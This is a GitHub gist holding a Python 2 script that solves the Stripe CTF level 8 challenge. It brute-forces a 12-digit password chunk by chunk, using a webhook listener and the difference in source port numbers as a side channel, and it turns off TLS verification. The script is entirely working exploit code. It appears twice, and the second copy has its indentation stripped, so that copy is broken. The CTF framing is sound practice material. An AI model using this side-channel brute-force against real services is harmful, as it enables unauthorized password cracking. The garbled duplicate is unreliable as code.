TvdW/gist:38c0430b5084f8442858 Secret

## gistfile1.py
import socket, json, random, time, httplib, requests
random.seed()

host = "https://level08-1.stripe-ctf.com/user-<mycode>"
port = random.randint(2000,60000)
me = "level02-1.stripe-ctf.com:%d" % port #Note: this script was ran from level02-1 via SSH

prevPort = -1000
lastPort = -1000
sess = None

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', port))
s.listen(5)

def worker():
    global prevPort, lastPort
    while 1:
        client, address = s.accept()
        prevPort = lastPort
        lastPort = address[1]
        client.close()

def post(data = ""):
    global sess
    if sess == None:
        sess = requests.session()
    r = sess.post(host, data=data, prefetch=True, verify=False).text
    return r

def makeRequest(num):
    global prevPort
    prevPort = -1
    result = post(json.dumps({'password': num, 'webhooks': [me]}))

    while prevPort == -1:
        time.sleep(1.0 / 1000000.0)

    return ("true" in result)

def checkOne(num, expectedNum):
    if makeRequest(num): return True
    i = 0
    while i < 15:
        if lastPort - prevPort == expectedNum:
            return False

        i = i + 1
        if makeRequest(num): return True

    return True

def checkRange(base = "", begin = 0, end = 999, expectedNum = 2):
    for n in range(begin, end+1):
        thisNum = ("000" + str(n))[-3:]
        fullNum = (base + thisNum + "000000000")[0:12]
        print fullNum
        if checkOne(fullNum, expectedNum):
            return thisNum

    return False

import threading
t = threading.Thread(target=worker)
t.daemon = True
t.start()

try:
    base = ""
    for i in range(0,4):
        num = checkRange(base, 0, 999, i+2)
        if num == False:
            num = checkRange(base, 0, 999, i+2)
            if num == False:
                print "FAILURE"

        print "NEXT CHUNK", num
        base += num
except Exception, e:
    s.close()
    raise

print
print "So the password is", base
print

s.close()
	import socket, json, random, time, httplib, requests
	random.seed()

	host = "https://level08-1.stripe-ctf.com/user-<mycode>"
	port = random.randint(2000,60000)
	me = "level02-1.stripe-ctf.com:%d" % port #Note: this script was ran from level02-1 via SSH

	prevPort = -1000
	lastPort = -1000
	sess = None

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.bind(('', port))
	s.listen(5)

	def worker():
	global prevPort, lastPort
	while 1:
	client, address = s.accept()
	prevPort = lastPort
	lastPort = address[1]
	client.close()

	def post(data = ""):
	global sess
	if sess == None:
	sess = requests.session()
	r = sess.post(host, data=data, prefetch=True, verify=False).text
	return r

	def makeRequest(num):
	global prevPort
	prevPort = -1
	result = post(json.dumps({'password': num, 'webhooks': [me]}))

	while prevPort == -1:
	time.sleep(1.0 / 1000000.0)

	return ("true" in result)

	def checkOne(num, expectedNum):
	if makeRequest(num): return True
	i = 0
	while i < 15:
	if lastPort - prevPort == expectedNum:
	return False

	i = i + 1
	if makeRequest(num): return True

	return True

	def checkRange(base = "", begin = 0, end = 999, expectedNum = 2):
	for n in range(begin, end+1):
	thisNum = ("000" + str(n))[-3:]
	fullNum = (base + thisNum + "000000000")[0:12]
	print fullNum
	if checkOne(fullNum, expectedNum):
	return thisNum

	return False

	import threading
	t = threading.Thread(target=worker)
	t.daemon = True
	t.start()

	try:
	base = ""
	for i in range(0,4):
	num = checkRange(base, 0, 999, i+2)
	if num == False:
	num = checkRange(base, 0, 999, i+2)
	if num == False:
	print "FAILURE"

	print "NEXT CHUNK", num
	base += num
	except Exception, e:
	s.close()
	raise

	print
	print "So the password is", base
	print

	s.close()